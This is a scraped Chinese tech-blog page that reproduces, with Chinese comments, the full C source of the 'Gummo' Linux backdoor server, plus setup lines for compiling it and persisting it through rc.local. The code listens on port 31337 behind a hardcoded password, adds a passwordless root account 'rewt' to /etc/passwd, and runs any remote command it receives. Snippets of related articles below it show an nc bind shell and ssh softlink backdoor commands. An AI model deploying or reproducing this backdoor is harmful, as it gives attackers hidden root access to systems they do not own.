linux运维电脑,Linux运维知识之linux 后门程序

最新推荐文章于 2024-05-05 00:13:31 发布
最新推荐文章于 2024-05-05 00:13:31 发布
阅读量190 收藏
点赞数
文章标签: linux运维电脑
本文深入剖析了一种名为Gummo的Linux后门程序,详细解释了其工作原理和代码实现。该后门在接收到特定密码后,允许远程访问并执行各种命令,包括创建非密码账号、模拟命令输出等。同时,文章警告了这种后门可能带来的安全风险,并强调了加强系统安全防护的重要性。
摘要由CSDN通过智能技术生成

d54e834f0a4047680d6df01a2d7c5497.gif

本文主要向你们介绍了Linux运维知识之linux 后门程序linux 后门linux 后门,通过详细的内容向你们展现,希望对各位学习Linux运维知识有所帮助。

/*

/*Gummo后门服务器

/*编译:ccserver.c-oserver

/*使用:./server&

/*echo/tmp/server&>>/etc/rc.d/rc.local

*/

#include

#include

#include

#include

#include

#include

#include

#include

#definePORT31337

#defineBACKLOG5

#defineCMD_LOG"/tmp/.cmd"

#definePASSWORD"password"

/*global*/

intnewfd;

voidcommand();

void

main()

{

intsockfd,sin_size,ss,len,bytes;

structsockaddr_inmy_addr;

structsockaddr_intheir_addr;

charpasswd[1024];

char*prompt="Password:";

char*gp;

//创建一个套节字

if((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1)

620bb216b976b79890461ad763ff7286.png

{

perror("socket");

exit(1);

}

my_addr.sin_family=AF_INET;

my_addr.sin_port=htons(PORT);

my_addr.sin_addr.s_addr=INADDR_ANY;

bzero(&(my_addr.sin_zero),8);

//绑定端口

if(bind(sockfd,(structsockaddr*)&my_addr,sizeof(structsockaddr))==-1)

{

perror("bind");

exit(1);

}

//接听

if(listen(sockfd,BACKLOG)==-1)

{

perror("listen");

exit(1);

}

while(1)

{

ss=sizeof(structsockaddr_in);

//一直接收着返回新的套节字

if((newfd=accept(sockfd,(structsockaddr*)&their_addr,&sin_size))==-1)

{

perror("accept");

exit(1);

}

//创建一个进程

//子进程返回0错误返回-1父进程返回pid

if(fork())

{

///父进程中/

23728ca97dbdd59bc417745448118f5a.png

len=strlen(prompt);

//往新的套节字里发数据也就是往客服端发数据

bytes=send(newfd,prompt,len,0);

//接收客服端的数据也就是密码

recv(newfd,passwd,1024,0);

//判断13首次出现位置

if((gp=strchr(passwd,13))!=NULL)

*(gp)=‘\0‘;

//密码正解

if(!strcmp(passwd,PASSWORD))

{

//继续发给客服端

send(newfd,"准许访问,HEH\n",21,0);

send(newfd,"\n\n\n\n\n\n欢迎来到Gummo后门服务器!\n\n",41,0);

send(newfd,"Type‘HELP‘foralistofcommands\n\n",36,0);

//将处理所有发送的命令并将他们的输出发送给客户端

command();

}

//密码错误直接退出

elseif(passwd!=PASSWORD)

{

send(newfd,"AuthentificationFailed!=/\n",29,0);

close(newfd);

}

}

}

}

//处理客服端的命令

void

command()

{

FILE*read;

FILE*append;

charcmd_dat[1024];

60927cb3a5caa126fb84078241a3f787.png

char*cmd_relay;

char*clean_log;

charbuf[5000];

intdxm;

while(1)

{

//先发送一个提示

send(newfd,"command:~#",11,0);

//等待接收

recv(newfd,cmd_dat,1024,0);

cmd_dat[strlen(cmd_dat)-2]=‘\0‘;

//判断命令是否为空

if(strcmp(cmd_dat,""))

{

//命令HELP

if((strstr(cmd_dat,"HELP"))==cmd_dat)

{

//help

send(newfd,"\n\n-=HelpMenu=-\n",16,0);

//quit

send(newfd,"\nquit-toexitgummobackdoor\n",31,0);

//rewt

send(newfd,"rewt-automaticallycreatesnonpasswordedaccnt‘rewt‘uid0\n",63,0);

//wipeout

send(newfd,"wipeout-thisfeaturerm-rf/‘sabox.Inspiredbydethcraze\n",64,0);

}

//quit

if((strstr(cmd_dat,"quit"))==cmd_dat)

{

close(newfd);

}

//rewt

if((strstr(cmd_dat,"rewt"))==cmd_dat)

{

d6d0f426dfdc3e795cbaaa3b8c9a9f46.png

system("echorewt::0:0::/:/bin/sh>>/etc/passwd;");

send(newfd,"User‘rewt‘added!\n",19,0);

}

//wipout

if((strstr(cmd_dat,"wipeout"))==cmd_dat)

{

send(newfd,"你尝试使用这个命令是不行的,HEH!\n",54,0);

close(newfd);

exit(0);

}

else

//搞一个临时文件保存命令字符串

append=fopen(CMD_LOG,"w");

fprintf(append,"dextro\n");

fclose(append);

//用于清理日志

clean_log=(char*)malloc(420);

sprintf(clean_log,"rm%s",CMD_LOG);

system(clean_log);

cmd_relay=(char*)malloc(1024);

//用于输出重定向

snprintf(cmd_relay,1024,"%s>%s;\0",cmd_dat,CMD_LOG);

system(cmd_relay);

if((read=fopen(CMD_LOG,"r"))==NULL)

continue;

while(!(feof(read)))

{

memset(buf,0,500);

fgets(buf,500,read);

if(buf[0]==0)

break;

write(newfd,buf,500);

}

fclose(read);

}

}

}

本文来自电脑杂谈,转载请注明本文网址:

http://www.pc-fly.com/a/jisuanjixue/article-135647-1.html

冯刚廷
关注
三年Linux运维工作总结教训
javalingyu的博客
05-01 807
阅读目录 一、线上操作规范 二、涉及数据 三、涉及安全 四、日常监控 五、性能调优 六、运维心态 Linux运维一定要知道的六类好习惯和23个教训,避免入坑! 从事运维三年半,遇到过各式各样的问题,数据丢失,网站挂马,误删数据库文件,黑客攻击等各类问题。 今天简单整理一下,分享给各位小伙伴。 回到顶部 一、线上操作规范 1.测试使用 当初学习Linux的使用,从基础到服务到集群,都是在虚拟机做的,虽然老师告诉我们跟真机没有什么差别,可是对真实环境的渴望日渐上升,不过虚拟机的各种快照却
Linux主机安全可视化运维(免费方案)
最新发布
炀炀的专栏
05-28 1834
本文介绍如何使用免费的主机安全软件,在自有机房或企业网络实现对Linux系统进行可视化的“主机安全”管理。
Linux下查找后门程序 CentOS 查后门程序的shell脚本
09-15
主要介绍了Linux下查找后门程序 CentOS 查后门程序的shell脚本,需要的朋友可以参考下
一个简单的Linux后门程序的实现
weixin_34015336的博客
03-29 328
程序实质是一个简单的socket编程,在受害方上运行攻击代码(后门进程),通过socket打开一个预设端口,并监听,等待攻击方的链接。一旦攻击方通过网络链接工具试图链接该socket,那么后门进程立刻fork一个子进程来处理链接请求。处理请求的行为即用exec函数打开一个shell来代替本子进程,并将本进程的标准输入、输出、出错文件描述符重定向到该套接字上,这样就实现了攻击方远程得到...
Linux编程之给你的程序后门
weixin_33938733的博客
01-14 124
这里说的“后门”并不是教你做坏事,而是让你做好事,搭建自己的调试工具更好地进行调试开发。我们都知道,当程序发生异常错误时,我们需要定位到错误,有时我们还想,我们在不修改程序的前提下,就能通过log来定位错误呢?有人会说,我在我的程序里加多点打印就好了,程序每做一步我就加一行打印,到时一查log就知道程序在哪一步死掉的了。这个方法在小程序里也许会行得通,但是,在一个大型系统,每秒的log达到几百条,...
linux后门rootkit程序介绍
Power of technology will free your body and spirit
06-06 3340
rkant = rootkit ant,它是利用netfilter hook开发的一款linux后门rootkit程序。 rkant包括服务器端程序(on victim server)和客户端程序(on user client pc),在ubuntu 14.04版本上面测试通过。 功能: 1、隐藏网络连接/端口,任意端口复用。不影响系统的正常工作和服务的正常运行。 2、隐藏文件以及
利用netfilter hook开发llinux后门rootkit程序
Power of technology will free your body and spirit
10-21 1357
rootdoor包括服务器端程序和客户端程序,在centos 6.5上面测试通过。 功能: 1、任意端口复用。端口复用,它就是在系统已经开放的端口上进行通讯,并且不影响系统的正常工作和服务的正常运行。 2、隐藏网络连接,端口,文件以及目录。用linux工具无法查看到。 3、隐藏模块,开机启动。 4、反向连接。服务器定时连接指定的ip/port。 5、反调试,防止被跟踪和破解。内容加密传
Linux运维安全与趋势分析:2012年2月特辑
这篇摘要主要涉及了2012年2月号的《Linux运维趋势》杂志,该杂志涵盖了一系列与Linux系统运维相关的主题,包括但不限于Linux基金会的访谈、IT技术路线图规划、RHEL支持期限、DDoS攻击与防御、Putty后门事件分析、...
2024年运维最新记一次Linux服务器上查杀木马经历(2),2024年最新记一次字节跳动Linux运维社招面试
2301_79054215的博客
05-05 629
手工杀进程或手工删除/home/WDPM/Development/WebServer/apache-tomcat-7.0.61/cmys文件,发现不过一会儿,又会出现相同的进程和文件。PidFile /opt/clamav/updata/clamd.pid 删掉前面的注释路径改为/opt/clamav/updata/clamd.pid。LogFile /opt/clamav/logs/clamd.log 删掉前面的注释目录改为/opt/clamav/logs/clamd.log。
linux 反弹后门 c语言,C语言做的后门【反连】
weixin_42441929的博客
05-12 193
该楼层疑似违规已被系统折叠隐藏此楼查看此楼/*Protocol of connectionConnect : CONNConnected Success : SUCCReboot : REBT 暂时不可用Upload : UPLDDownload : DNLDDestroy : DTOY 暂时不可用Help : HELP 暂时不可用OK : START TO TRANSFER ...
linux后门程序,Linux后门
weixin_30263409的博客
05-07 470
===Linux入侵检测===0.断网1.history查看最近命令执行历史2./var/log/*日志检查3.lastloglast查看登录信息4.netstat-anp查看可疑连接5.lsmod查看加载的模块6.ps-awuxf查看可疑进程7./etc/passwdcrontabshellsshfstab配置文件检查8.find/-perm-0...
linux 系统命令被后门修改_Linux、Windows权限维持常用后门学习总结
weixin_39640687的博客
11-21 509
前言在上周做的变种DDG挖矿木马-watchdogs应急响应中,攻击者使用了预加载来劫持ps、top等系统命令,没有提及具体的排查手段,借着这篇文章来详细解释下,并总结下Linux、Windows下权限维持中被常用的后门技术,借此来学习下。PS: 所有技术细节都来源于网上文章,如有错误,还望大佬不吝指正!0x01 Linux常见的bash、脚本语言、计划任务、公钥、msf以及rootkit等就不详...
linux后门分析,浅谈Linux后门技术及实践入侵
weixin_34511324的博客
05-13 307
2、编译程序encode,依次执行得到关键字符串与magic串异或后的结果,例如原始login的文件名/sbin/xlogin,经过异或后为:\x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb3、在后门源代码中这样定义:Charlogin[]="\x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb";然后插入异或函数char *de...
记一次Ubuntu黑屏
weixin_46344889的博客
05-13 1885
系统 ubuntu20.04 2022年5月12日,关闭系统 2022年5月13日,启动电脑,无法进入系统,纯黑屏,左上交光标都没有,能够使用键盘安全重启。 在Recovery menu中看到有三个内核,6个选项 分别是: Ubuntu Linux 5.13.0-41-generic Ubuntu Linux 5.13.0-41-generic(recovery mode) Ubuntu Linux 5.13.0-40-generic Ubuntu Linux 5.13.0-40-gene
Linux权限维持—后门
内心不种满鲜花就会长满杂草
04-18 3844
Rootkit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。 rootkit是linux平台下最常见的一种木马后门工具,它主要是通过替换系统文件来达到入侵和隐藏的目的。rootkit主要分为文件级别的和内核级别的
linux后门源码,linux后门
weixin_29466045的博客
05-12 726
ssh软连接#只有root用户才可以这种方法#拿到root权限后执行ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555;#任意密码连接5555端口ssh root@106.13.124.93:5555ssh root@106.13.124.93 -p 5555检测:查看可疑进程# ps aux清除后门:结束进程即可,# kill -s 9 PID添...
Linux 多个留后门姿势
热门推荐
3569
08-17 2万+
https://www.anquanke.com/post/id/155943 在一次渗透中,成功获取某目标几台比较重要的机器,当时只想着获取脱库,结果动静太大被发现了,之前渗透并没太在意Linux维持权限,经过此次事后从Google找各种资料,一款满意的rootkit都没有,现在一直在关注这方面,但还是没有找到满意的后门,在渗透圈一个人的资源总是有限往往你全力追求的,也不过是别人的一层关系就可...
Linux后门之道——NC用法别有洞天
苏安的博客
03-06 2429
对于瑞士军刀nc我们再熟悉不过了,经常被用来进行数据包发送,文件传送以及反弹shell。在渗透测试过程中如果想反弹shell我们通常的做法是:nc -l -vv -p 2222 -e /bin/bash在Linux的大部分发行版中都默认编译了nc,但也许是出于安全考虑,发行版中默认编译的nc往往没有-e选项(没有define一个GAPING_...
Linux运维实战技巧与RAID知识解析
"这篇资料主要介绍了Linux运维工程师所需掌握的一些基本技能,包括文件操作、端口转发、crontab定时任务设置、shell脚本编写以及RAID存储技术的工作原理和特点。" 一、Linux文件操作 在Linux环境中,对文件进行操作...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值